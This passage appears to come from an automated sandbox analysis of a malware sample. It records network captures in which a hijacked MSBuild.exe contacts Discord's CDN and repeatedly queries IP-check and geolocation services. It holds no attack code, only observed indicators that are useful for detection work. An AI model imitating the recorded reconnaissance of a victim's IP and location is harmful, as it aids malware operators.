Apr 11, 2024 11:33:40.126674891 CEST	49749	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:40.280307055 CEST	80	49749	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:40.280441999 CEST	49749	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:40.280601025 CEST	49749	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:40.281394958 CEST	80	49744	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:40.281457901 CEST	49744	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:40.433978081 CEST	80	49749	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:46.808294058 CEST	80	49747	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:46.810058117 CEST	49750	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:46.810110092 CEST	443	49750	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:46.810205936 CEST	49750	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:46.810467958 CEST	49750	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:46.810482979 CEST	443	49750	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:46.850047112 CEST	49747	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:46.987812996 CEST	443	49750	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:46.989526987 CEST	49750	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:46.989592075 CEST	443	49750	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:47.204152107 CEST	443	49750	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:47.204502106 CEST	443	49750	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:47.204585075 CEST	49750	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:47.205061913 CEST	49750	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:47.223413944 CEST	49751	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:47.376823902 CEST	80	49751	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:47.377182961 CEST	49751	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:47.377238989 CEST	49751	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:47.530749083 CEST	80	49751	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:48.749878883 CEST	80	49749	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:48.751808882 CEST	49752	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:48.751892090 CEST	443	49752	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:48.752018929 CEST	49752	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:48.752495050 CEST	49752	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:48.752535105 CEST	443	49752	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:48.803339958 CEST	49749	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:48.938257933 CEST	443	49752	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:48.939867973 CEST	49752	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:48.939939022 CEST	443	49752	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:49.152757883 CEST	443	49752	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:49.153064013 CEST	443	49752	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:49.153137922 CEST	49752	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:49.153556108 CEST	49752	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:49.327598095 CEST	49737	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:49.327780008 CEST	49749	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:57.209315062 CEST	80	49751	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:57.211384058 CEST	49753	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:57.211427927 CEST	443	49753	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:57.211694956 CEST	49753	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:57.211954117 CEST	49753	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:57.211967945 CEST	443	49753	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:57.256262064 CEST	49751	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:57.397105932 CEST	443	49753	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:57.404608011 CEST	49753	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:57.404643059 CEST	443	49753	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:57.612088919 CEST	443	49753	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:57.612425089 CEST	443	49753	172.67.177.134	192.168.2.5
Apr 11, 2024 11:33:57.612531900 CEST	49753	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:57.613111019 CEST	49753	443	192.168.2.5	172.67.177.134
Apr 11, 2024 11:33:57.617043972 CEST	49751	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:57.617544889 CEST	49754	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:57.770909071 CEST	80	49754	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:57.771466017 CEST	80	49751	158.101.44.242	192.168.2.5
Apr 11, 2024 11:33:57.771614075 CEST	49751	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:57.771619081 CEST	49754	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:58.041028023 CEST	49754	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:33:58.194793940 CEST	80	49754	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:01.582509995 CEST	80	49754	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:01.590444088 CEST	49755	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:01.631290913 CEST	49754	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:01.744146109 CEST	80	49755	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:01.744498014 CEST	49755	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:01.744590044 CEST	49755	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:01.898418903 CEST	80	49755	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:03.898072958 CEST	80	49755	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:03.902055979 CEST	49754	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:03.902064085 CEST	49755	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:04.055366039 CEST	80	49754	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:04.055392981 CEST	80	49755	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:04.055430889 CEST	49754	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:06.055424929 CEST	80	49755	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:06.100033998 CEST	49755	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:06.990349054 CEST	49756	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:07.143804073 CEST	80	49756	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:07.143917084 CEST	49756	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:07.144032001 CEST	49756	80	192.168.2.5	158.101.44.242
Apr 11, 2024 11:34:07.297209024 CEST	80	49756	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:08.412054062 CEST	80	49756	158.101.44.242	192.168.2.5
Apr 11, 2024 11:34:08.459399939 CEST	49756	80	192.168.2.5	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2024 11:32:01.182451010 CEST	65057	53	192.168.2.5	1.1.1.1
Apr 11, 2024 11:32:01.265657902 CEST	53	65057	1.1.1.1	192.168.2.5
Apr 11, 2024 11:32:35.922965050 CEST	53889	53	192.168.2.5	1.1.1.1
Apr 11, 2024 11:32:36.006480932 CEST	53	53889	1.1.1.1	192.168.2.5
Apr 11, 2024 11:32:55.538964987 CEST	64462	53	192.168.2.5	1.1.1.1
Apr 11, 2024 11:32:55.622087955 CEST	53	64462	1.1.1.1	192.168.2.5
Apr 11, 2024 11:33:20.464234114 CEST	58976	53	192.168.2.5	1.1.1.1
Apr 11, 2024 11:33:20.549808025 CEST	53	58976	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 11, 2024 11:32:01.182451010 CEST	192.168.2.5	1.1.1.1	0xe408	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:35.922965050 CEST	192.168.2.5	1.1.1.1	0x56a9	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:55.538964987 CEST	192.168.2.5	1.1.1.1	0x67c6	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:33:20.464234114 CEST	192.168.2.5	1.1.1.1	0xf829	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 11, 2024 11:32:01.265657902 CEST	1.1.1.1	192.168.2.5	0xe408	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:01.265657902 CEST	1.1.1.1	192.168.2.5	0xe408	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:01.265657902 CEST	1.1.1.1	192.168.2.5	0xe408	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:01.265657902 CEST	1.1.1.1	192.168.2.5	0xe408	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:01.265657902 CEST	1.1.1.1	192.168.2.5	0xe408	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:20.067601919 CEST	1.1.1.1	192.168.2.5	0x91ad	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:20.067601919 CEST	1.1.1.1	192.168.2.5	0x91ad	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:20.307193041 CEST	1.1.1.1	192.168.2.5	0x22a8	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2024 11:32:20.307193041 CEST	1.1.1.1	192.168.2.5	0x22a8	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:36.006480932 CEST	1.1.1.1	192.168.2.5	0x56a9	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 11, 2024 11:32:36.006480932 CEST	1.1.1.1	192.168.2.5	0x56a9	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:36.006480932 CEST	1.1.1.1	192.168.2.5	0x56a9	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:36.006480932 CEST	1.1.1.1	192.168.2.5	0x56a9	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:36.006480932 CEST	1.1.1.1	192.168.2.5	0x56a9	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:36.006480932 CEST	1.1.1.1	192.168.2.5	0x56a9	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:55.622087955 CEST	1.1.1.1	192.168.2.5	0x67c6	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:55.622087955 CEST	1.1.1.1	192.168.2.5	0x67c6	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:55.622087955 CEST	1.1.1.1	192.168.2.5	0x67c6	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:55.622087955 CEST	1.1.1.1	192.168.2.5	0x67c6	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:32:55.622087955 CEST	1.1.1.1	192.168.2.5	0x67c6	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:33:20.549808025 CEST	1.1.1.1	192.168.2.5	0xf829	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:33:20.549808025 CEST	1.1.1.1	192.168.2.5	0xf829	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:33:20.895131111 CEST	1.1.1.1	192.168.2.5	0xe5dd	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 11, 2024 11:33:20.895131111 CEST	1.1.1.1	192.168.2.5	0xe5dd	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49717	158.101.44.242	80	2128	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:32:36.165873051 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:32:37.319255114 CEST	682	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 11 Apr 2024 09:32:37 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49731	158.101.44.242	80	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:20.132493019 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:33:20.286756039 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>
Apr 11, 2024 11:33:20.291660070 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:33:20.445918083 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>
Apr 11, 2024 11:33:21.271359921 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:33:21.428685904 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:21 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49735	158.101.44.242	80	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:21.996386051 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:33:22.151057959 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:22 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49737	158.101.44.242	80	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:22.718226910 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:33:23.379410982 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:23 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49739	158.101.44.242	80	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:23.933660984 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:33:25.604667902 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:25 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49741	158.101.44.242	80	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:27.345308065 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:33:31.539907932 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49742	158.101.44.242	80	5408	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 11, 2024 11:33:28.650985956 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 11, 2024 11:33:33.819098949 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:33 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>
Apr 11, 2024 11:33:33.822393894 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:33:34.014940977 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:33 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>
Apr 11, 2024 11:33:34.438519001 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 11, 2024 11:33:34.643286943 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 11 Apr 2024 09:33:34 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 36 2e 31 34 36 2e 33 36 2e 31 39 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 156.146.36.197</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49744	158.101.44.242	80	5640	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
